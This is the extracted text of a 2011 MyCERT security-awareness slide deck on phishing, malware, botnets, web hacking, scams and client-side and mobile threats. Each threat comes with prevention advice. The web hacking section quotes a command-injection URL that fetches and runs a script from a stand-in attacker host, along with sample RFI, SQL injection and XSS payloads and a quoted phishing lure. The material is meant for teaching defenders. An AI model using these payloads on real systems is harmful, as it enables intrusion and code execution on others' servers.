seminar keselamatan ict 2011 kementerian · pdf filebangladesh oman qatar pakistan egypt syria...

Ministry of Science,Technology & Innovation

Hacking AnatomySalahudin Wan Khairuzzaman

SEMINAR KESELAMATAN ICT

2011 KEMENTERIAN

KESIHATAN MALAYSIA

Securing Our CyberspaceCopyright © 2009 CyberSecurity Malaysia

24/3/2011

Salahudin Wan Khairuzzaman GCIH, CEH, ENSA

Intrusion Analyst

Malaysia Computer Emergency Response Team (MyCERT)

Malware Research

Cyber Early Warning

LebahNetAdvisory and

Alerts

Copyright © 2009 CyberSecurity Malaysia 2

Securing Our Cyberspace

Emerging Threats Threats

Visualization

MyCERT Statistics2010 and Early 2011



2010 and Early 2011

Cyber999™

MyCERT – Emergency Services

Incidents Handled in 2010Incidents Handled in 2010



Cyber999™


Incidents Handled in 2011(JanIncidents Handled in 2011(Jan--Feb)Feb)



Spam Emails in 2010Spam Emails in 2010

Cyber999™




Cyber999™


Spam Emails in 2011(JanSpam Emails in 2011(Jan--Feb)Feb)



Cyber999™


Botnet drones & Malware Infection in 2010Botnet drones & Malware Infection in 2010



Cyber999™


Botnet drones & Malware Infection in 2010(JanBotnet drones & Malware Infection in 2010(Jan--Feb)Feb)



Cyber999™


Honeynet Project Incidents in 2010Honeynet Project Incidents in 2010



Cyber999™


Honeynet Project Incidents in 2011(JanHoneynet Project Incidents in 2011(Jan--Feb)Feb)



Technical and Global

Co-



Co-ordination

Technical Co-ordination

ISPsCyber

National Cooperation



VendorsLaw Enforcement, Authorities

Regulators

ISPsCyber SecurityExperts

MCMC

DELLDELLIBMIBM

gcert

Technical Coordination Centre



International Collaboration

European Government CSIRTs Group

(EGC)

European Network and Information Security Agency(ENISA)

MyCERT is an SC member

Organization of American States (OAS)

Forum of Incident Response Teams



(ENISA)

“OIC CYBER EMERGENCY RESPONSE TEAM”

Pakistan

Saudi

Tunisia

Malaysia

UAE

Indonesia

Nigeria

Morocco

Brunei

Bahrain

Bangladesh

Oman

EgyptPakistanQatar

Syria Kuwait

Jordan

OIC-CERT Task Force Member

Organization of Islamic Countries Computer Emergency Response Teams

States (OAS) CERT

Turkey

Home

Current Trend and Threats

Overview

� Phishing

�Malware

� Botnet

�Web Hacking



�Web Hacking

� Scam

�Client Side Attack

�Mobile Devices

What threat is this?



More examples..



Phishing



Phishing

Phishing

� Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication[source: wikipedia]



� Still works today

� Targeting favourite banks in Malaysia / international

� Uses long URL that masquerading the original website

Phishing Methodology

11

33

Malicious

Hackers

INTERNET



22

44

Victim

Real

Website

Fake

Website

Phishing



That’s old phishing attack…..Let see how hackers redefine their tactics



Same Phishing Methodology

11

33

Malicious

Hackers

INTERNET



22

44

Victim

Real

Website

Fake

Website

We are hereby notifying you that we've recently suffered a DDos-Attack on one of

our's Online Banking server. For security reasons you must complete the next steps

to verify the integrity of your Maybank account. If you fail to complete the

verification in the next 24 hours your account will be suspended.

Here's how to get started:

1. Log in to Maybank online account (click here).

2. You must request for TAC via Maybank online banking - your TAC

will be sent via SMS to the mobile phone number you registered.

https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do

Phishing Redefined



(you can find the "Request a TAC" button in the Utilities menu of

your account)

3. Logout from your account and close the browser.

4. When you have received the TAC (Transaction Authorization Code) on

your mobile phone, go to our secured verification server and

submit the requested information (Username, password and TAC).

to go on our secured server. (click here)

5. Please allow 48 hours for processing.

Please comply and thanks for understanding.

***This is an automated message, please do not reply***

http://static-217-133-89-90.clienti.tiscali.it//

Phishing Website –Username, Password & Transaction Authorization Code



Phishing

Does it really works?



Does it really works?

Phishing



Prevention



Prevention

Initiative from provider itself..



Phishing : Prevention

� Do not respond to e-mails requesting for your personal information

� Do not open attachments or download files

� Do not click on links provided in e-mails.

� DontPhishMe add-ons in Mozilla Firefox and Chrome



� https://addons.mozilla.org/en-US/firefox/addon/dontphishme/

� Netcraft Anti-Phishing toolbar� http://toolbar.netcraft.com/

� Report to MyCERT by forwarding the email to [email protected]

DontPhishMe

� Below is the list of supported online banking websites:

o * Maybank2u

o * Cimbclicks

o * Public Bank

o * Bank Rakyat

o * Bank Islam



o * Bank Islam

o * HSBC

o * EON Bank

o * UOB

o * AMBank

o * OCBC

o * RHB

o * Citibank

o * Standard Chartered Bank

o * Al Rajhi Bank

o * Affin Bank

DontPhishMe screenshots





Malware

Malware

�A computer program created with malicious intents.

� It performs malicious tasks:� Stealing your identity

� Key logging

Disrupt system



� Disrupt system

� Damage data

� Attack other computers

Malware

� We can get infected by malware from almost everywhere:

� Web (drive by download, web exploitation, flash)

� Fake antivirus

� Email (email attachment, links)

� Files (pdf, doc, jpeg, etc.etc [file exploitation])

� Video/Mp3 (fake codec, file exploitation)



� Video/Mp3 (fake codec, file exploitation)

� Portable hardisk

� Errr..your USB storage?

Malware

�Unpatched systems or systems with vulnerable applications will easily become target to malware.

�Malicious software includes� Trojan horse

� Virus

Worms



� Worms

A computer worm is a self-replicating malware computer program.

A Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system

A computer virus is a computer program that can copy itself and infect a computer

Malware: What MyCERT Observed?

� MyCERT have been collected more than 25K unique samples.

� Most of it are positive with detection from antivirus software.

� Using honeypot concept (low interaction) for collecting malware.



� Most likely coming from host which infected by sort of malware.

� Malware is normally distributed by IRC, FTP and HTTP

Threatexpert geographic



VirusTotal statistics



Malware: Scenario (Conficker)



Malware : Conficker : What MyCERT Observed?




Top Country




Top .my Domain Requested



Current trends

� Targeted attacks

o Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment

o spread using infected removable drives such as



o spread using infected removable drives such as USB flash drives

o designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems

o Targeting 5 Iranian organizations - probable target widely suspected to be uranium enrichment infrastructure in Iran.

Prevention



Prevention

Malware : Prevention

� Patch.. Patch.. Patch.. and Patch (OS & Applications)

� Make sure Antivirus installed and up-to-date

� Stay away from illegal/questionable sites

� Be careful with mail attachments!

� Be careful with ‘autorun’ thumbdrive



� Be careful with ‘autorun’ thumbdrive

� Report to MyCERT : [email protected]

Botnet



Botnet

� Botnet is collection of compromised computers (called Zombie computers) running software, usually installed via worms, Trojan horses, or backdoors, under a common command-and-control (C&C) infrastructure.

�Use to perform DDoS, Automated hacking,



�Use to perform DDoS, Automated hacking, Spamming, etc..etc..

Botnet : Scenario

1. Botnet operator sends out viruses or worms• infect ordinary users [trojan application is the

bot]

2. The bot on the infected PC logs into an IRC server



• Server is known as the command-and-control server

3. Spammer gets access to botnet from operator

4. Spammer sends instructions to the infected PCs

5. Infected PCs send out spam messages

Botnet : DDoS



Web Hacking



Web Security Threats

R F I



CODE INJECTIONlala.php?Id=1&cmd=uname –a || wget hax0r.net/ipwn3du.sh && ./ipwn3du.sh &&

rm ipwn3du.sh

Web Defacement

Web defacement is an attack on a website that changes

the visual appearance of the site.

These are typically the work of a system cracker, who

break into a web server and replace the hosted website



break into a web server and replace the hosted website

with on of their own.

A message is often left on the webpage along with a shout

out to his or her friends.

Web Hacking

When attacker successfully attack a website, they

can:

oChange of view the disclosed information on the

sites



oChange account information , edit the database.

oRemove the entire websites , drop database etc

etc.

oDeface the web pages

oMany more..

Web Hacking

�Most Common methods:� RFI

� [ex. drop sites: =http://www.example/malicious-code.txt??]

� SQL Injection� Union

� Select



� Select

� %20

� %27

� XSS - enables malicious attackers to inject client-side script into web pages viewed by other users� <SCRIPT>alert("XSS")</SCRIPT


� This is what we see:



Remote File Inclusion + Steganography

� This is what attacker have



Prevention



Prevention

Web Hacking : Prevention


� Secure coding practice� http://www.mycert.org.my/en/resources/web_security/main/main/detail/573/index.html

� Secure configurations

� Modified php.ini

� allow_url_include=off



� allow_url_include=off

� register_globals=off

� 3rd party applications (GreenSQL, PHP-IDS, modSecurity, etc2)

� Web Application Firewall (WAF)

� Log analysis (time to time)


� By having proper network design/firewall rules, we can reduce the threat as well:

o DMZ (web server) are not allow to connect to IRC protocol

o DMZ (web server) are not allow to establish

Prevention : Network Design



o DMZ (web server) are not allow to establish connection to unknown sites/ftp server

o DMZ (web server) are not allow to establish connection to search engine

o Proxi’ed web server?


� Dear Sir/Madam, Congratulations! We are pleased to announce you as one of the 3 lucky winners in the FLASH MEGA LOTTERY draw held today. All 3 winning addresses were randomly selected from a batch of 5,000,000 international



selected from a batch of 5,000,000 international emails. Your email address emerged alongside to others as a 3rd category winner in this month's draw. Consequently, you have therefore been approved for a total pay out of $1,950,000.00 Dollars (One Million Nine Hundred and Fifty Thousand United State Dollars) only.

Scam

� May related to phishing

� Nigerian or Russian Scam

� Normally through email with title “From the desk of Mr [name]” or “Your Assistance is needed”

� Email-Hijacking / Friends Scams



� Email-Hijacking / Friends Scams

� Purchasing goods and online.

� Lottery scam.

� Pet scam.

� Fake job offer.

� Etc etc.. You name it!

Prevention



Prevention

� Do not expose your 16 digits card number

� Customer Card ID Number (CID or CVV2 number)

� Expiry Date

� This scam is normally through

Prevention



� This scam is normally through

phone.

� Google out your full name to protect your information.

� Do not respond to anonymous E-mail

� Bill Gates don’t give free ipod through the internet.

Prevention



internet.

� Make sure you follow up

on any process or procedures.

Prevention

� http://www.hoax-slayer.com/

Hoax-Slayer is dedicated to debunking email hoaxes, thwarting Internet scammers, combating spam, and educating web users about email and Internet security issues



Internet security issues

What’s now/next?



What’s now/next?

Client Side Attack



Client Side Attack

�Target vulnerabilities in client applications that interact with a malicious server or process malicious data.



Client Side Attack

� Common Target� Browser (IE, Firefox, Chrome, Safari)

� PDF Reader (Adobe Acrobat, Foxit)

� Flash Player

� Multimedia Plugin (Java, Quicktime, ActiveX)

� Microsoft Office Apps (Excel, PowerPoint)



� Microsoft Office Apps (Excel, PowerPoint)

Client Side Attack

� Used in ‘Targeted Attack’

o Scenario: Receive file with attachment from boss

� Normally used current propaganda to conduct social engineering:

o US Presidential Election

o Tibetan Movement



o Tibetan Movement

o Pharmacy spam

o Swine Flu

o Michael Jackson

Client Side Attack : Acrobat Reader (1)



Client Side Attack : Acrobat Reader (2)



Client Side Attack : Advisories 2010

� MA-261.122010 : MyCERT Alert - Critical Vulnerability in Microsoft Internet Explorer

� MA-257.112010 :Multiple Critical Vulnerabilities in Adobe Reader

� MA-256.112010 : Critical Vulnerability in Microsoft Internet Explorer

� MA-255.102010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player

� MA-254.102010 : MyCERT Alert - Critical vulnerability in Mozilla Firefox

� MA-253.102010 : MyCERT Alert - Critical Vulnerability in Adobe Shockwave Player

� MA-252.102010 : MyCERT Alert - Multiple Critical Vulnerabilities in Oracle Java SE and Java for Business

� MA-250.092010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player

� MA-249.092010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader

� MA-246.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player

� MA-245.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader

� MA-243.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Flash Player



� MA-242.082010 : MyCERT Alert - Latest Patch for Microsoft Vulnerabilities (August 2010)

� MA-234.062010: MyCERT Alert -Critical Vulnerabilities in Adobe Flash Player, Adobe Reader and Acrobat

� MA-232.052010: MyCERT Alert -Multiple Critical Vulnerabilities in Adobe Shockwave Player

� MA-230.052010: MyCERT Alert - Critical Vulnerability in Safari Web Browser

� MA-229.042010: MyCERT Advisory -Vulnerability in Microsoft Sharepoint Could Allow Elevation of Privilege

� MA-226.042010: MyCERT Alert - Multiple Critical Vulnerability in Adobe Acrobat and Reader

� MA-225.042010: MyCERT Alert - Oracle JRE Java Platform SE and Java Deployment Toolkit Plugins Code Execution Vulnerabilities

� MA-221.032010 : MyCERT Alert – Critical Vulnerability in Microsoft Internet Explorer

� MA-218.032010 : MyCERT Alert - Microsoft Windows Help File Code Execution Vulnerability Within Internet Explorer via VBScript

� MA-217.022010:MyCERT Alert - Critical Vulnerability in Adobe Download Manager

� MA-216.022010: MyCERT Alert - Critical Vulnerability in Adobe Acrobat and Adobe Reader

� MA-214.022010: MyCERT Alert - Information disclosures vulnerabilities in Internet Explorer

� MA-212.012010: MyCERT Alert - Google Chrome Multiple Critical Vulnerabilities

Prevention



Prevention

Client Side Attack : Prevention


� Make sure Antivirus installed and up-to-date

� Be careful with mail attachments and URL!

� Stay away from questionable sites

� Use extra protection :) (Firewall, F-Secure Exploit



� Use extra protection :) (Firewall, F-Secure Exploit Shield, Google Safe Browsing API (about:config))


Google safe browsing API



Mobile Devices



Mobile Devices

�Target mobile phone with specific Operating System

�Very recent

�Attacking method:� SMS



� MMS

� Attachment

� Bluetooth

� Warez/free applications downloaded (not official)

Mobile Devices : Transmitter.C (malware)



Mobile Malware



Skull.D Commwarrior BlankfontDoomboot

Mobile Malware (cont’d)



Mobile Devices

�Affected Product� iPhone (Safari browser)

� Symbian (SMS, MMS, Warez, File)

� Windows Mobile [HTC] (Bluetooth, Warez)

� BlackBerry (Attachment)

� Android devices



� Android devices

Mobile Devices : Advisories

MA-177.072009: MyCERT Alert - 0day in HTC (Windows Mobile) OBEX FTP Service - Directory TraversalMA-176.072009: MyCERT Alert - 0day in Symbian S60 (Nokia) Firmware Media Codecs - Multiple Memory Corruption VulnerabilitiesMA-174.072009: MyCERT Alert - Transmitter.C Mobile Malware AdvisoryMA-193.092009: MyCERT Alert - Critical Vulnerability in iPhone and iPod Touch Operating SystemMA-213.022010: MyCERT Alert - Latest Security Update for iPhone OS and iPod Touch (February 2010)MA-274.032011 : MyCERT Alert - Critical Vulnerability in Webkit Browser Engine for BlackBerry



Prevention



Prevention

Client Side Attack : Prevention

� Patch.. Patch.. Patch.. and Patch (if available)

� Do not open questionable SMS, MMS or files

� Do not browse to unknown websites received via SMS or MMS from known or unknown person

� Do not download and install unknown or untrusted third party application that is uploaded into the



third party application that is uploaded into the website and forum

� Do not to accept pairing or connection requests from unknown sources

� It is recommended to use Antivirus


Google search tips

� “keywords” filetype:doc

� “keywords” site:my

� “keywords” inurl:google.com

� “keywords” inurl:phpmyadmin

� Phrase search “ “

� Calculator



� Calculator

� Currency Converter

� word1 OR word2 --finds pages that include either word

� Word1 AND word2 --finds pages that include both word

� Term you want to exclude (-) (e.g word1 -word2)

� Term you want to include (+) (e.g word1 +word2)

Conclusion



Conclusion

Security isOUR

Small Issues

BIG Problem



OURResponsibility

Mode of Incident Referrals

1. Email� [email protected]� [email protected]

2. Phone� +603 8992 6969� +1300-88-2999

3. Fax� +603 8945 3442



� +603 8945 3442

4. SMS� +6019 281 3801

5. Mobile (24x7)� +6019 266 5850

6. Online – http://www.mycert.org.my

1. Office Hours – MYT 0830 - 1730

Q & A



Q & A

THANK YOU

[email protected]

[email protected]

[email protected]

for

for

forhttp://www.cybersecurity.my

http://www.mycert.org.my

http://www.esecurity.org.my

Corporate website

Technical website

Our Websites and emails



for

[email protected] → for incidence reporting

[email protected] → for general inquiries

http://www.esecurity.org.myAwareness Portal

http://cnii.cybersecurity.my for

seminar keselamatan ict 2011 kementerian · pdf filebangladesh oman qatar pakistan egypt syria...

Documents